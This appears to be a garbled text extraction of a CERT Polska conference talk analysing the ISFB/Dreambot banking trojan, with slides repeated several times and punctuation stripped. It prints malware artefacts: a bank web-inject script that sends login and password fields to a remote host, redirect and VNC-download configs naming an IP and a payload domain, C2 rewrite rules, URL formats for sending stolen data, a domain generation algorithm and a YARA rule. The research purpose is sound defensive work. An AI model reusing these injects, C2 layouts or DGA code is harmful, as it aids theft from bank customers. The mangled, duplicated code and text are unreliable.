Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2158
Static cfg - fields
0x556aed8f - server0xea9ea760 - bootstrap0x656b798a - botnet0x4fa8693e - key0xd0665bf6 0x75e6145c - domains0xefc574ae - dga_seed0x73177345 - dga_base_url0xec99df2e - dga_tld0xdf351e24 - tor32_dll0x510f22d2 - tor_domains
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2158
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2258
Static cfg
2258
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
02122016 ISFB
httpslokalhostpltalksbotconf20161 4858
IAP
4858
02122016 ISFB
httpslokalhostpltalksbotconf20161 4958
IAP
4958
02122016 ISFB
httpslokalhostpltalksbotconf20161 5058
DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]
5058
Dreambot
02122016 ISFB
httpslokalhostpltalksbotconf20161 5158
Dreambot
5158
02122016 ISFB
httpslokalhostpltalksbotconf20161 5258
Dreambot
5258
02122016 ISFB
httpslokalhostpltalksbotconf20161 5358
Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper
5358
02122016 ISFB
httpslokalhostpltalksbotconf20161 5458
The Endor not
02122016 ISFB
httpslokalhostpltalksbotconf20161 5558
Offsprings and Cousins
Common RootsPayloads
NymainPowersniff PunchyBagg
middotmiddot
BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common
middotmiddotmiddot
5558
Recap
02122016 ISFB
httpslokalhostpltalksbotconf20161 5658
Recap
One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb
middotmiddotmiddotmiddotmiddotmiddotmiddot
5658
02122016 ISFB
httpslokalhostpltalksbotconf20161 5758
Kudospeople that knowingly (or not) halped us
SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
5758
02122016 ISFB
httpslokalhostpltalksbotconf20161 5858
Q amp A
infocertpl wwwcertpl
CERTPolska CERTPolska
CERTPolska CERTPolska_en
mak makcertpl
02122016 ISFB
httpslokalhostpltalksbotconf20161 2358
Static cfg
2358
02122016 ISFB
httpslokalhostpltalksbotconf20161 2458
Static cfg
2458
02122016 ISFB
httpslokalhostpltalksbotconf20161 2558
Man in the Browser or where my goes my mony
Dynamic config
02122016 ISFB
httpslokalhostpltalksbotconf20161 2658
Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]
C
2658
02122016 ISFB
httpslokalhostpltalksbotconf20161 2758
Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()
2758
02122016 ISFB
httpslokalhostpltalksbotconf20161 2858
Web Actions
FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
2858
02122016 ISFB
httpslokalhostpltalksbotconf20161 2958
Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin
2958
02122016 ISFB
httpslokalhostpltalksbotconf20161 3058
The Bot
Registry Keys
02122016 ISFB
httpslokalhostpltalksbotconf20161 3158
Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12
InstallClientNetCfgLastTaskLastConfig
middotmiddotmiddotmiddotmiddot
3158
02122016 ISFB
httpslokalhostpltalksbotconf20161 3258
Other Acctions
GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK
middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot
3258
02122016 ISFB
httpslokalhostpltalksbotconf20161 3358
Calling Home
02122016 ISFB
httpslokalhostpltalksbotconf20161 3458
ET phone home
Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network
middotmiddotmiddotmiddot
3458
02122016 ISFB
httpslokalhostpltalksbotconf20161 3558
DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)
PYTHON
3558
TOR
02122016 ISFB
httpslokalhostpltalksbotconf20161 3658
TOR
3658
02122016 ISFB
httpslokalhostpltalksbotconf20161 3758
P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet
C
3758
02122016 ISFB
httpslokalhostpltalksbotconf20161 3858
Internet is Hard
3858
02122016 ISFB
httpslokalhostpltalksbotconf20161 3958
URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data
3958
02122016 ISFB
httpslokalhostpltalksbotconf20161 4058
URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))
PYTHON
crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887
4058
URL format
02122016 ISFB
httpslokalhostpltalksbotconf20161 4158
URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc
4158
02122016 ISFB
httpslokalhostpltalksbotconf20161 4258
CampC respone
4258
02122016 ISFB
httpslokalhostpltalksbotconf20161 4358
CampC respone
4358
02122016 ISFB
httpslokalhostpltalksbotconf20161 4458
Wiki
Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen
Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES
4458
02122016 ISFB
httpslokalhostpltalksbotconf20161 4558
CampC respone
4558
02122016 ISFB
httpslokalhostpltalksbotconf20161 4658
Command and Control
02122016 ISFB
httpslokalhostpltalksbotconf20161 4758
IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break
4758
